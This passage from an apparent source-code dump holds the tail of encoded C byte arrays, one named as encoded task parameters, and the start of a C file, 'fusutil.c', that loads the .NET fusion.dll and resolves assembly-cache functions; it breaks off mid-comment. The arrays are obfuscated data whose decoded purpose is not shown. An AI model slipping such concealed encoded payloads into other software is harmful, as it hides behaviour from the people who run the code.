0x30,\n\t0x00, 0xC2, 0xE6, 0x09, 0x7E, 0x24, 0x2D, 0x90, 0x1E, 0x40, 0xBD, 0x03, 0x4E, 0x0E, 0x78, 0x38,\n\t0x1C, 0xE0, 0xA4, 0x83, 0x54, 0x0E, 0x78, 0x3A, 0x00, 0xE8, 0xA5, 0xA3, 0x2F, 0x8C, 0x76, 0x30,\n\t0x06, 0xC2, 0xF7, 0x09, 0x2C, 0x24, 0x74, 0x90, 0x64, 0x40, 0xF4, 0x03, 0x75, 0x0E, 0x7D, 0x38,\n\t0x04, 0xE0, 0xA8, 0x83, 0x68, 0x0E, 0x73, 0x3A, 0x4A, 0xE8, 0x81, 0xA3, 0x12, 0x8C, 0x29, 0x30,\n\t0x51, 0xC2, 0xC9, 0x09, 0x2E, 0x24, 0x67, 0x90, 0x64, 0x40, 0xF4, 0x03, 0x75, 0x0E, 0x7D, 0x38,\n\t0x04, 0xE0, 0xA8, 0x83, 0x68, 0x0E, 0x73, 0x3A, 0x4A, 0xE8, 0xED, 0xA3, 0x11, 0x8C, 0x79, 0x30,\n\t0x08, 0xC2, 0xF0, 0x09, 0x46, 0x24, 0x21, 0x90, 0x4D, 0x40, 0xE4, 0x03, 0x68, 0x0E, 0x69, 0x38,\n\t0x04, 0xE0, 0xFF, 0x83, 0x57, 0x0E, 0x49, 0x3A, 0x45, 0xE8, 0x99, 0xA3, 0x7A, 0x8C, 0x37, 0x30,\n\t0x36, 0xC2, 0xE5, 0x09, 0x7B, 0x24, 0x3C, 0x90, 0x74, 0x40, 0xE8, 0x03, 0x6A, 0x0E, 0x79, 0x38,\n\t0x1F, 0xE0, 0xB4, 0x83, 0x73, 0x0E, 0x23, 0x3A, 0x48, 0xE8, 0x82, 0xA3, 0x32, 0x8C, 0x77, 0x30,\n\t0x11, 0xC2, 0xCB, 0x09, 0x7C, 0x24, 0x01, 0x90, 0x44, 0x40, 0xED, 0x03, 0x62, 0x0E, 0x59, 0x38,\n\t0x1E, 0xE0, 0xA5, 0x83, 0x39, 0x0E, 0x69, 0x3A, 0x06, 0xE8, 0xA4, 0xA3, 0x23, 0x8C, 0x24, 0x30,\n\t0x4E, 0xC2, 0xD7, 0x09, 0x66, 0x24, 0x27, 0x90, 0x50, 0x40, 0xCE, 0x03, 0x69, 0x0E, 0x55, 0x38,\n\t0x14, 0xE0, 0xAD, 0x83, 0x62, 0x0E, 0x58, 0x3A, 0x1A, 0xE8, 0xB5, 0xA3, 0x78, 0x8C, 0x24, 0x30,\n\t0x33, 0xC2, 0xE1, 0x09, 0x61, 0x24, 0x3C, 0x90, 0x41, 0x40, 0xF3, 0x03, 0x73, 0x0E, 0x53, 0x38,\n\t0x1E, 0xE0, 0x88, 0x83, 0x63, 0x0E, 0x71, 0x3A, 0x11, 0xE8, 0xEF, 0xA3, 0x20, 0x8C, 0x79, 0x30,\n\t0x0D, 0xC2, 0xF7, 0x09, 0x77, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xD3, 0x03, 0x62, 0x0E, 0x6F, 0x38,\n\t0x04, 0xE0, 0xA0, 0x83, 0x75, 0x0E, 0x69, 0x3A, 0x3B, 0xE8, 0xBF, 0xA3, 0x0F, 0x8C, 0x7C, 0x30,\n\t0x0D, 0xC2, 0xE1, 0x09, 0x2C, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xC8, 0x03, 0x63, 0x0E, 0x70, 0x38,\n\t0x15, 0xE0, 0x92, 0x83, 0x62, 0x0E, 0x69, 0x3A, 0x00, 0xE8, 0xB8, 0xA3, 0x28, 0x8C, 0x7F, 0x30,\n\t0x12, 0xC2, 0xBA, 0x09, 0x2E, 0x24, 0x09, 0x90, 0x4C, 0x40, 0xED, 0x03, 0x68, 0x0E, 0x6B, 0x38,\n\t0x23, 0xE0, 0xB5, 0x83, 0x66, 0x0E, 0x6F, 0x3A, 0x00, 0xE8, 0x9E, 0xA3, 0x28, 0x8C, 0x5C, 0x30,\n\t0x04, 0xC2, 0xE9, 0x09, 0x73, 0x24, 0x26, 0x90, 0x44, 0x40, 0xBF, 0x03, 0x73, 0x0E, 0x6E, 0x38,\n\t0x05, 0xE0, 0xA4, 0x83, 0x3B, 0x0E, 0x32, 0x3A, 0x35, 0xE8, 0xBD, 0xA3, 0x2A, 0x8C, 0x77, 0x30,\n\t0x16, 0xC2, 0xD7, 0x09, 0x66, 0x24, 0x29, 0x90, 0x52, 0x40, 0xF5, 0x03, 0x48, 0x0E, 0x72, 0x38,\n\t0x34, 0xE0, 0xA4, 0x83, 0x6A, 0x0E, 0x7C, 0x3A, 0x1A, 0xE8, 0xB5, 0xA3, 0x78, 0x8C, 0x24, 0x30,\n\t0x24, 0xC2, 0xEA, 0x09, 0x73, 0x24, 0x2A, 0x90, 0x4C, 0x40, 0xE4, 0x03, 0x63, 0x0E, 0x22, 0x38,\n\t0x04, 0xE0, 0xB3, 0x83, 0x72, 0x0E, 0x78, 0x3A, 0x48, 0xE8, 0xFE, 0xA3, 0x03, 0x8C, 0x76, 0x30,\n\t0x00, 0xC2, 0xE6, 0x09, 0x7E, 0x24, 0x2D, 0x90, 0x44, 0x40, 0xBF, 0x03, 0x3B, 0x0E, 0x54, 0x38,\n\t0x19, 0xE0, 0xA5, 0x83, 0x63, 0x0E, 0x78, 0x3A, 0x1A, 0xE8, 0xEF, 0xA3, 0x20, 0x8C, 0x79, 0x30,\n\t0x0D, 0xC2, 0xF7, 0x09, 0x77, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xC9, 0x03, 0x6E, 0x0E, 0x78, 0x38,\n\t0x14, 0xE0, 0xA4, 0x83, 0x69, 0x0E, 0x23, 0x3A, 0x48, 0xE8, 0x83, 0xA3, 0x33, 0x8C, 0x76, 0x30,\n\t0x2E, 0xC2, 0xEA, 0x09, 0x7E, 0x24, 0x31, 0x90, 0x69, 0x40, 0xE7, 0x03, 0x4E, 0x0E, 0x78, 0x38,\n\t0x1C, 0xE0, 0xA4, 0x83, 0x39, 0x0E, 0x7B, 0x3A, 0x15, 0xE8, 0xBD, 0xA3, 0x35, 0x8C, 0x7D, 0x30,\n\t0x5D, 0xC2, 0xAB, 0x09, 0x40, 0x24, 0x3D, 0x90, 0x4E, 0x40, 0xCE, 0x03, 0x69, 0x0E, 0x70, 0x38,\n\t0x09, 0xE0, 0x88, 0x83, 0x61, 0x0E, 0x54, 0x3A, 0x10, 0xE8, 0xBD, 0xA3, 0x23, 0x8C, 0x26, 0x30,\n\t0x5D, 0xC2, 0xD1, 0x09, 0x61, 0x24, 0x2D, 0x90, 0x75, 0x40, 0xEF, 0x03, 0x6E, 0x0E, 0x7A, 0x38,\n\t0x19, 0xE0, 0xA4, 0x83, 0x63, 0x0E, 0x4E, 0x3A, 0x17, 0xE8, 0xB9, 0xA3, 0x23, 0x8C, 0x7C, 0x30,\n\t0x14, 0xC2, 0xE8, 0x09, 0x7B, 0x24, 0x26, 0x90, 0x47, 0x40, 0xC4, 0x03, 0x69, 0x0E, 0x7B, 0x38,\n\t0x19, 0xE0, 0xAF, 0x83, 0x62, 0x0E, 0x23, 0x3A, 0x12, 0xE8, 0xB0, 0xA3, 0x2A, 0x8C, 0x6B, 0x30,\n\t0x04, 0xC2, 0xB8, 0x09, 0x3D, 0x24, 0x1D, 0x90, 0x53, 0x40, 0xE4, 0x03, 0x52, 0x0E, 0x72, 0x38,\n\t0x19, 0xE0, 0xA7, 0x83, 0x6E, 0x0E, 0x78, 0x3A, 0x10, 0xE8, 0x82, 0xA3, 0x25, 0x8C, 0x70, 0x30,\n\t0x04, 0xC2, 0xE0, 0x09, 0x67, 0x24, 0x24, 0x90, 0x49, 0x40, 0xEF, 0x03, 0x60, 0x0E, 0x59, 0x38,\n\t0x1E, 0xE0, 0xA6, 0x83, 0x6E, 0x0E, 0x73, 0x3A, 0x11, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x4F, 0x30,\n\t0x00, 0xC2, 0xEF, 0x09, 0x77, 0x24, 0x1C, 0x90, 0x4F, 0x40, 0xD3, 0x03, 0x72, 0x0E, 0x72, 0x38,\n\t0x4E, 0xE0, 0xA7, 0x83, 0x66, 0x0E, 0x71, 0x3A, 0x07, 0xE8, 0xB4, 0xA3, 0x7A, 0x8C, 0x37, 0x30,\n\t0x36, 0xC2, 0xE5, 0x09, 0x79, 0x24, 0x2D, 0x90, 0x74, 0x40, 0xEE, 0x03, 0x55, 0x0E, 0x69, 0x38,\n\t0x1E, 0xE0, 0xFF, 0x83, 0x3B, 0x0E, 0x58, 0x3A, 0x0C, 0xE8, 0xB4, 0xA3, 0x25, 0x8C, 0x6D, 0x30,\n\t0x15, 0xC2, 0xED, 0x09, 0x7D, 0x24, 0x26, 0x90, 0x74, 0x40, 0xE8, 0x03, 0x6A, 0x0E, 0x79, 0x38,\n\t0x3C, 0xE0, 0xA8, 0x83, 0x6A, 0x0E, 0x74, 0x3A, 0x00, 0xE8, 0xEF, 0xA3, 0x16, 0x8C, 0x4C, 0x30,\n\t0x56, 0xC2, 0xB6, 0x09, 0x5A, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xC4, 0x03, 0x7F, 0x0E, 0x79, 0x38,\n\t0x13, 0xE0, 0xB4, 0x83, 0x73, 0x0E, 0x74, 0x3A, 0x1B, 0xE8, 0xBF, 0xA3, 0x12, 0x8C, 0x71, 0x30,\n\t0x0C, 0xC2, 0xE1, 0x09, 0x5E, 0x24, 0x21, 0x90, 0x4D, 0x40, 0xE8, 0x03, 0x73, 0x0E, 0x22, 0x38,\n\t0x4C, 0xE0, 0x91, 0x83, 0x75, 0x0E, 0x74, 0x3A, 0x1B, 0xE8, 0xA3, 0xA3, 0x2F, 0x8C, 0x6C, 0x30,\n\t0x18, 0xC2, 0xBA, 0x09, 0x25, 0x24, 0x74, 0x90, 0x0F, 0x40, 0xD1, 0x03, 0x75, 0x0E, 0x75, 0x38,\n\t0x1F, 0xE0, 0xB3, 0x83, 0x6E, 0x0E, 0x69, 0x3A, 0x0D, 0xE8, 0xEF, 0xA3, 0x7A, 0x8C, 0x37, 0x30,\n\t0x32, 0xC2, 0xE1, 0x09, 0x66, 0x24, 0x3C, 0x90, 0x49, 0x40, 0xEF, 0x03, 0x60, 0x0E, 0x6F, 0x38,\n\t0x4E, 0xE0, 0xFD, 0x83, 0x46, 0x0E, 0x7E, 0x3A, 0x00, 0xE8, 0xB8, 0xA3, 0x29, 0x8C, 0x76, 0x30,\n\t0x12, 0xC2, 0xA4, 0x09, 0x51, 0x24, 0x27, 0x90, 0x4E, 0x40, 0xF5, 0x03, 0x62, 0x0E, 0x64, 0x38,\n\t0x04, 0xE0, 0xFC, 0x83, 0x25, 0x0E, 0x5C, 0x3A, 0x01, 0xE8, 0xA5, 0xA3, 0x2E, 0x8C, 0x77, 0x30,\n\t0x13, 0xC2, 0xA6, 0x09, 0x2C, 0x24, 0x74, 0x90, 0x65, 0x40, 0xF9, 0x03, 0x62, 0x0E, 0x7F, 0x38,\n\t0x4E, 0xE0, 0xFD, 0x83, 0x44, 0x0E, 0x72, 0x3A, 0x19, 0xE8, 0xBC, 0xA3, 0x27, 0x8C, 0x76, 0x30,\n\t0x05, 0xC2, 0xBA, 0x09\n};\n\nstatic const unsigned char g_encodedTaskParamEnd[69] = {\n\t0x5D, 0xC2, 0xAB, 0x09, 0x51, 0x24, 0x27, 0x90, 0x4D, 0x40, 0xEC, 0x03, 0x66, 0x0E, 0x72, 0x38,\n\t0x14, 0xE0, 0xFF, 0x83, 0x3B, 0x0E, 0x32, 0x3A, 0x31, 0xE8, 0xA9, 0xA3, 0x23, 0x8C, 0x7B, 0x30,\n\t0x5F, 0xC2, 0xB8, 0x09, 0x3D, 0x24, 0x09, 0x90, 0x43, 0x40, 0xF5, 0x03, 0x6E, 0x0E, 0x73, 0x38,\n\t0x1E, 0xE0, 0xB2, 0x83, 0x39, 0x0E, 0x21, 0x3A, 0x5B, 0xE8, 0x85, 0xA3, 0x27, 0x8C, 0x6B, 0x30,\n\t0x0A, 0xC2, 0xBA, 0x09, 0x12\n};\n\nstatic const unsigned char g_webviewvsinfo[1224] = {\n\t0xBB, 0xE2, 0xF9, 0x9B, 0x37, 0x6E, 0x8A, 0xB8, 0x22, 0xE2, 0x9A, 0x8B, 0x40, 0x2C, 0x1D, 0xB0,\n\t0x33, 0xC2, 0xD6, 0x0B, 0x5E, 0x2E, 0x13, 0xB9, 0x3D, 0xE6, 0x92, 0x9B, 0x7E, 0x6E, 0x92, 0xB9,\n\t0x35, 0xE6, 0x82, 0x9B, 0x37, 0x6E, 0xDC, 0xB8, 0xCC, 0xE6, 0x2A, 0x75, 0x16, 0x2C, 0x59, 0xB0,\n\t0x61, 0xC2, 0x84, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x73, 0xE6, 0xCC, 0x9B, 0x37, 0x6E, 0xDC, 0xB9,\n\t0x4C, 0xE6, 0xCD, 0x9B, 0x37, 0x6E, 0xDC, 0xB8, 0x75, 0xE2, 0xC5, 0x8B, 0x14, 0x2C, 0x58, 0xB0,\n\t0x61, 0xC2, 0x85, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6A, 0xDC, 0xB9,\n\t0x73, 0xE6, 0x9E, 0x9B, 0x43, 0x6E, 0xAE, 0xB8, 0x18, 0xE2, 0xAB, 0x8B, 0x71, 0x2C, 0x1E, 0xB0,\n\t0x08, 0xC2, 0xE9, 0x0B, 0x72, 0x2E, 0x15, 0xB9, 0x1D, 0xE6, 0xAB, 0x9B, 0x58, 0x6E, 0xDC, 0xB9,\n\t0x77, 0xE2, 0xCD, 0x9B, 0x37, 0x6E, 0xEC, 0xB8, 0x45, 0xE2, 0xF5, 0x8B, 0x2F, 0x2C, 0x68, 0xB0,\n\t0x55, 0xC2, 0xC7, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x3F, 0xE6, 0xE1, 0x9B, 0x36, 0x6E, 0x9F, 0xB9,\n\t0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x58, 0x2C, 0x39, 0xB0,\n\t0x0C, 0xC2, 0xE0, 0x0B, 0x17, 0x2E, 0x5C, 0xB9, 0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB9,\n\t0x1C, 0xE6, 0xBE, 0x9B, 0x58, 0x6E, 0xBA, 0xB8, 0x05, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x37, 0xB0,\n\t0x13, 0xC2, 0xF5, 0x0B, 0x78, 0x2E, 0x2E, 0xB9, 0x12, 0xE6, 0xB9, 0x9B, 0x5E, 0x6E, 0xB3, 0xB9,\n\t0x1D, 0xE6, 0xCD, 0x9B, 0xBF, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x83, 0x8B, 0x7F, 0x2C, 0x34, 0xB0,\n\t0x04, 0xC2, 0xC1, 0x0B, 0x72, 0x2E, 0x2F, 0xB9, 0x10, 0xE6, 0xBF, 0x9B, 0x5E, 0x6E, 0xAC, 0xB9,\n\t0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x5B, 0x2C, 0x31, 0xB0,\n\t0x02, 0xC2, 0xF7, 0x0B, 0x78, 0x2E, 0x2F, 0xB9, 0x1C, 0xE6, 0xAB, 0x9B, 0x43, 0x6E, 0xFC, 0xB9,\n\t0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB8, 0x51, 0xE2, 0x80, 0x8B, 0x7B, 0x2C, 0x3A, 0xB0,\n\t0x04, 0xC2, 0xE1, 0x0B, 0x73, 0x2E, 0x39, 0xB9, 0x17, 0xE6, 0xED, 0x9B, 0x75, 0x6E, 0xAE, 0xB9,\n\t0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0xE5, 0x8B, 0x41, 0x2C, 0x3D, 0xB0,\n\t0x03, 0xC2, 0xD3, 0x0B, 0x7E, 0x2E, 0x39, 0xB9, 0x04, 0xE6, 0xED, 0x9B, 0x74, 0x6E, 0xB0, 0xB9,\n\t0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x26, 0x2C, 0x48, 0xB0,\n\t0x60, 0xC2, 0xC3, 0x0B, 0x7E, 0x2E, 0x30, 0xB9, 0x16, 0xE6, 0x9B, 0x9B, 0x52, 0x6E, 0xAE, 0xB9,\n\t0x00, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB8, 0x71, 0xE2, 0xC5, 0x8B, 0x27, 0x2C, 0x76, 0xB0,\n\t0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x72, 0xB9, 0x43, 0xE6, 0xCD, 0x9B, 0x6F, 0x6E, 0xEA, 0xB9,\n\t0x72, 0xE6, 0x84, 0x9B, 0x59, 0x6E, 0xA8, 0xB8, 0x14, 0xE2, 0xB7, 0x8B, 0x78, 0x2C, 0x39, 0xB0,\n\t0x0D, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x72, 0x6E, 0xB1, 0xB9,\n\t0x11, 0xE6, 0xA8, 0x9B, 0x53, 0x6E, 0xB8, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x54, 0x2C, 0x2A, 0xB0,\n\t0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0x9A, 0x9B, 0x52, 0x6E, 0xBE, 0xB9,\n\t0x25, 0xE6, 0xA4, 0x9B, 0x52, 0x6E, 0xAB, 0xB8, 0x5F, 0xE2, 0xA1, 0x8B, 0x7A, 0x2C, 0x34, 0xB0,\n\t0x61, 0xC2, 0x85, 0x0B, 0x87, 0x2E, 0x30, 0xB9, 0x72, 0xE6, 0x81, 0x9B, 0x52, 0x6E, 0xBB, 0xB9,\n\t0x12, 0xE6, 0xA1, 0x9B, 0x74, 0x6E, 0xB3, 0xB8, 0x01, 0xE2, 0xBC, 0x8B, 0x64, 0x2C, 0x31, 0xB0,\n\t0x06, 0xC2, 0xED, 0x0B, 0x63, 0x2E, 0x5C, 0xB9, 0x30, 0xE6, 0xA2, 0x9B, 0x47, 0x6E, 0xA5, 0xB9,\n\t0x01, 0xE6, 0xA4, 0x9B, 0x50, 0x6E, 0xB4, 0xB8, 0x05, 0xE2, 0xE5, 0x8B, 0x5B, 0x2C, 0x31, 0xB0,\n\t0x02, 0xC2, 0xF7, 0x0B, 0x78, 0x2E, 0x2F, 0xB9, 0x1C, 0xE6, 0xAB, 0x9B, 0x43, 0x6E, 0xFC, 0xB9,\n\t0x30, 0xE6, 0xA2, 0x9B, 0x45, 0x6E, 0xAC, 0xB8, 0x1E, 0xE2, 0xB7, 0x8B, 0x77, 0x2C, 0x2C, 0xB0,\n\t0x08, 0xC2, 0xEA, 0x0B, 0x79, 0x2E, 0x72, 0xB9, 0x53, 0xE6, 0x8C, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9,\n\t0x53, 0xE6, 0xBF, 0x9B, 0x5E, 0x6E, 0xBB, 0xB8, 0x19, 0xE2, 0xB1, 0x8B, 0x65, 0x2C, 0x78, 0xB0,\n\t0x13, 0xC2, 0xE0, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xBB, 0x9B, 0x52, 0x6E, 0xB8, 0xB9,\n\t0x5D, 0xE6, 0xCD, 0x9B, 0x57, 0x6E, 0xEA, 0xB8, 0x70, 0xE2, 0x8A, 0x8B, 0x64, 0x2C, 0x31, 0xB0,\n\t0x06, 0xC2, 0xEC, 0x0B, 0x79, 0x2E, 0x3D, 0xB9, 0x1F, 0xE6, 0x8B, 0x9B, 0x5E, 0x6E, 0xB0, 0xB9,\n\t0x16, 0xE6, 0xA3, 0x9B, 0x56, 0x6E, 0xB1, 0xB8, 0x14, 0xE2, 0xC5, 0x8B, 0x53, 0x2C, 0x35, 0xB0,\n\t0x03, 0xC2, 0xE0, 0x0B, 0x73, 0x2E, 0x38, 0xB9, 0x16, 0xE6, 0xA9, 0x9B, 0x75, 0x6E, 0xAE, 0xB9,\n\t0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB8, 0x03, 0xE2, 0x92, 0x8B, 0x73, 0x2C, 0x3A, 0xB0,\n\t0x37, 0xC2, 0xEC, 0x0B, 0x72, 0x2E, 0x2B, 0xB9, 0x5D, 0xE6, 0xA9, 0x9B, 0x5B, 0x6E, 0xB0, 0xB9,\n\t0x73, 0xE6, 0xCD, 0x9B, 0xB7, 0x6E, 0x82, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0,\n\t0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x3D, 0xE6, 0xAC, 0x9B, 0x5A, 0x6E, 0xB9, 0xB9,\n\t0x73, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB8, 0x12, 0xE2, 0xB7, 0x8B, 0x79, 0x2C, 0x2B, 0xB0,\n\t0x0E, 0xC2, 0xE3, 0x0B, 0x63, 0x2E, 0x7C, 0xB9, 0x36, 0xE6, 0xA9, 0x9B, 0x50, 0x6E, 0xB9, 0xB9,\n\t0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB8, 0x14, 0xE2, 0xA1, 0x8B, 0x72, 0x2C, 0x3D, 0xB0,\n\t0x05, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x2E, 0xB9, 0x1C, 0xE6, 0xBA, 0x9B, 0x44, 0x6E, 0xB9, 0xB9,\n\t0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB8, 0x13, 0xE2, 0x93, 0x8B, 0x7F, 0x2C, 0x3D, 0xB0,\n\t0x16, 0xC2, 0xA5, 0x0B, 0x54, 0x2E, 0x30, 0xB9, 0x1A, 0xE6, 0xA8, 0x9B, 0x59, 0x6E, 0xA8, 0xB9,\n\t0x73, 0xE6, 0xCD, 0x9B, 0x03, 0x6E, 0xCC, 0xB8, 0x70, 0xE2, 0x95, 0x8B, 0x64, 0x2C, 0x37, 0xB0,\n\t0x05, 0xC2, 0xF0, 0x0B, 0x74, 0x2E, 0x28, 0xB9, 0x25, 0xE6, 0xA8, 0x9B, 0x45, 0x6E, 0xAF, 0xB9,\n\t0x1A, 0xE6, 0xA2, 0x9B, 0x59, 0x6E, 0xDC, 0xB8, 0x40, 0xE2, 0xEB, 0x8B, 0x26, 0x2C, 0x76, 0xB0,\n\t0x51, 0xC2, 0xAB, 0x0B, 0x27, 0x2E, 0x5C, 0xB9, 0x4F, 0xE6, 0xD9, 0x9B, 0x36, 0x6E, 0x9F, 0xB9,\n\t0x1C, 0xE6, 0xA0, 0x9B, 0x47, 0x6E, 0xBD, 0xB8, 0x1F, 0xE2, 0xBC, 0x8B, 0x45, 0x2C, 0x30, 0xB0,\n\t0x0E, 0xC2, 0xF7, 0x0B, 0x63, 0x2E, 0x12, 0xB9, 0x12, 0xE6, 0xA0, 0x9B, 0x52, 0x6E, 0xDC, 0xB9,\n\t0x3E, 0xE6, 0xA4, 0x9B, 0x54, 0x6E, 0xAE, 0xB8, 0x1E, 0xE2, 0xB6, 0x8B, 0x79, 0x2C, 0x3E, 0xB0,\n\t0x15, 0xC2, 0x85, 0x0B, 0x9F, 0x2E, 0x02, 0xB9, 0x72, 0xE6, 0x9D, 0x9B, 0x45, 0x6E, 0xB3, 0xB9,\n\t0x17, 0xE6, 0xB8, 0x9B, 0x54, 0x6E, 0xA8, 0xB8, 0x22, 0xE2, 0xAD, 0x8B, 0x79, 0x2C, 0x2A, 0xB0,\n\t0x15, 0xC2, 0xCB, 0x0B, 0x76, 0x2E, 0x31, 0xB9, 0x16, 0xE6, 0xCD, 0x9B, 0x7A, 0x6E, 0xB5, 0xB9,\n\t0x10, 0xE6, 0xBF, 0x9B, 0x58, 0x6E, 0xAF, 0xB8, 0x1E, 0xE2, 0xA3, 0x8B, 0x62, 0x2C, 0x78, 0xB0,\n\t0x24, 0xC2, 0xE1, 0x0B, 0x70, 0x2E, 0x39, 0xB9, 0x53, 0xE6, 0x88, 0x9B, 0x5A, 0x6E, 0xBE, 0xB9,\n\t0x16, 0xE6, 0xA9, 0x9B, 0x53, 0x6E, 0xB9, 0xB8, 0x15, 0xE2, 0xE5, 0x8B, 0x54, 0x2C, 0x2A, 0xB0,\n\t0x0E, 0xC2, 0xF2, 0x0B, 0x64, 0x2E, 0x39, 0xB9, 0x01, 0xE6, 0xED, 0x9B, 0x60, 0x6E, 0xB9, 0xB9,\n\t0x11, 0xE6, 0x9B, 0x9B, 0x5E, 0x6E, 0xB9, 0xB8, 0x06, 0xE2, 0xE5, 0x8B, 0x55, 0x2C, 0x34, 0xB0,\n\t0x08, 0xC2, 0xE0, 0x0B, 0x79, 0x2E, 0x28, 0xB9, 0x73, 0xE6, 0xCD, 0x9B, 0x1F, 0x6E, 0xD8, 0xB9,\n\t0x72, 0xE6, 0x82, 0x9B, 0x51, 0x6E, 0xBA, 0xB8, 0x18, 0xE2, 0xA6, 0x8B, 0x7F, 0x2C, 0x39, 0xB0,\n\t0x0D, 0xC2, 0xA5, 0x0B, 0x55, 0x2E, 0x29, 0xB9, 0x1A, 0xE6, 0xA1, 0x9B, 0x53, 0x6E, 0xDC, 0xB9,\n\t0x42, 0xE6, 0xCD, 0x9B, 0x73, 0x6E, 0xDC, 0xB8, 0x71, 0xE2, 0x93, 0x8B, 0x77, 0x2C, 0x2A, 0xB0,\n\t0x27, 0xC2, 0xEC, 0x0B, 0x7B, 0x2E, 0x39, 0xB9, 0x3A, 0xE6, 0xA3, 0x9B, 0x51, 0x6E, 0xB3, 0xB9,\n\t0x73, 0xE6, 0xCD, 0x9B, 0x13, 0x6E, 0xD8, 0xB8, 0x71, 0xE2, 0x91, 0x8B, 0x64, 0x2C, 0x39, 0xB0,\n\t0x0F, 0xC2, 0xF6, 0x0B, 0x7B, 0x2E, 0x3D, 0xB9, 0x07, 0xE6, 0xA4, 0x9B, 0x58, 0x6E, 0xB2, 0xB9,\n\t0x73, 0xE6, 0xCD, 0x9B, 0x3E, 0x6A, 0x6C, 0xBC\n};\n"
},
{
"path": "Source/Akagi/fusutil.c",
"content": "/*******************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2020 - 2026\n*\n* TITLE: FUSUTIL.C\n*\n* VERSION: 3.69\n*\n* DATE: 12 Feb 2026\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n\n/*\n* fusUtilInitFusion\n*\n* Purpose:\n*\n* Load .NET Assembly Manager dll and remember function pointers.\n*\n*/\nBOOLEAN fusUtilInitFusion(\n _In_ DWORD dwVersion\n)\n{\n HMODULE hFusion;\n LPCWSTR lpFusionDir;\n pfnCreateAssemblyCache CreateAssemblyCache;\n pfnCreateAssemblyEnum CreateAssemblyEnum;\n\n WCHAR szBuffer[MAX_PATH * 2];\n\n if (g_ctx->FusionContext.Initialized)\n return TRUE;\n\n if (dwVersion != 2 && dwVersion != 4)\n return FALSE;\n\n //\n // Build path to assembly manager dll\n //\n _strcpy(szBuffer, g_ctx->szSystemRoot);\n _strcat(szBuffer, MSNETFRAMEWORK_DIR);\n\n#ifdef _WIN64\n _strcat(szBuffer, TEXT(\"64\"));\n#endif\n\n if (dwVersion == 2)\n lpFusionDir = NET2_DIR;\n else\n lpFusionDir = NET4_DIR;\n\n supConcatenatePaths(szBuffer, lpFusionDir, ARRAYSIZE(szBuffer));\n supConcatenatePaths(szBuffer, TEXT(\"fusion.dll\"), ARRAYSIZE(szBuffer));\n\n hFusion = LoadLibraryEx(szBuffer, NULL, 0);\n if (hFusion == NULL)\n return FALSE;\n\n CreateAssemblyCache = (pfnCreateAssemblyCache)GetProcAddress(hFusion, \"CreateAssemblyCache\");\n CreateAssemblyEnum = (pfnCreateAssemblyEnum)GetProcAddress(hFusion, \"CreateAssemblyEnum\");\n if (CreateAssemblyCache == NULL ||\n CreateAssemblyEnum == NULL)\n {\n FreeLibrary(hFusion);\n return FALSE;\n }\n\n g_ctx->FusionContext.hFusion = hFusion;\n g_ctx->FusionContext.CreateAssemblyCache = CreateAssemblyCache;\n g_ctx->FusionContext.CreateAssemblyEnum = CreateAssemblyEnum;\n g_ctx->FusionContext.Initialized = TRUE;\n\n return TRUE;\n}\n\n/*\n* fusUtilBinToUnicodeHex\n*\n* Purpose:\n*\n* Bin to Hex special edition.\n*\n*/\nVOID fusUtilBinToUnicodeHex(\n _In_ const BYTE* pSrc,\n _In_ UINT cSrc,\n _Out_cap_(2 * cSrc + 1) LPWSTR pDst)\n{\n UINT x;\n UINT y;\n\n#define TOHEX(a) (WCHAR)((a)>=10 ? L'a'+(a)-10 : L'0'+(a))\n\n for (x = 0, y = 0; x < cSrc; ++x)\n {\n UINT v;\n v = pSrc[x] >> 4;\n pDst[y++] = TOHEX(v);\n v = pSrc[x] & 0x0f;\n pDst[y++] = TOHEX(v);\n }\n pDst[y] = L'\\0';\n}\n\n/*\n* fusUtilGetAssemblyName\n*\n* Purpose:\n*\n* Return 